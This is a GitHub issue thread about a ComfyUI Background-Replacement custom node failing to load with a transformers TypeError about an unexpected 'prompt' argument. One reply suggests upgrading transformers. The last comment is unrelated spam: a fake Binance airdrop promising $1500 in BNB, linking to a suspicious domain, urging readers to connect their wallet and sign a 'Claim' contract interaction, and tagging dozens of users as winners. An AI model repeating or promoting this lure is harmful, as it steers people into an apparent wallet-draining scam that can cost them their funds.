### ISSUE TITLE
ImageToTextPipeline._sanitize_parameters() got an unexpected keyword argument 'prompt'

### ISSUE THREAD

**Issue by cassien3562** [meap158/ComfyUI-Background-Replacement#2]
I encountered this issue during installation. Is there any solution？
### ComfyUI-Background-Replacement: Initializing captioner...
Traceback (most recent call last):
  File "F:\ComfyUI_windows_portable\ComfyUI\nodes.py", line 1813, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 940, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Background-Replacement\__init__.py", line 93, in <module>
    init()
  File "F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Background-Replacement\__init__.py", line 82, in init
    init_captioner()
  File "F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Background-Replacement\captioner.py", line 12, in init
    captioner = pipeline(
                ^^^^^^^^^
  File "F:\ComfyUI_windows_portable\python_embeded\Lib\site-packages\transformers\pipelines\__init__.py", line 903, in pipeline
    return pipeline_class(model=model, framework=framework, task=task, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "F:\ComfyUI_windows_portable\python_embeded\Lib\site-packages\transformers\pipelines\image_to_text.py", line 53, in __init__
    super().__init__(*args, **kwargs)
  File "F:\ComfyUI_windows_portable\python_embeded\Lib\site-packages\transformers\pipelines\base.py", line 790, in __init__
    self._preprocess_params, self._forward_params, self._postprocess_params = self._sanitize_parameters(**kwargs)
                                                                              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: ImageToTextPipeline._sanitize_parameters() got an unexpected keyword argument 'prompt'

**Comment by Lilneo786** [comment]
`pip install --upgrade transformers
`

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Richienb, @maraoz, @comepradz, @lukehedger, @ben-kaufman, @ade555, @gutdraw, @goodideadog, @ligduan, @0b01, @sijo0703, @maheshmurthy, @mevbots, @chodex-xyz, @balupton, @haxshad, @mhaidarhanif, @pradiptadeb1990, @hwwhww, @onestarshang, @thecooltechguy, @bogren, @mengguang, @jaskcheng, @mkmitchell, @nunatak, @hero5512, @JetJadeja, @kmazz, @nibley, @fand, @AntonioRoldan, @onyxrev, @visar, @shriharishastry, @jumang4423, @foowaa, @dogecrypto, @UN-9BOT, @edwardtay, @kenberkeley, @gessichen, @iFrogHop2Worlds, @wuyongyi, @mortemn, @dav1ds, @mikesprague, @ErikBjare, @uberscientist, @EverettBerry
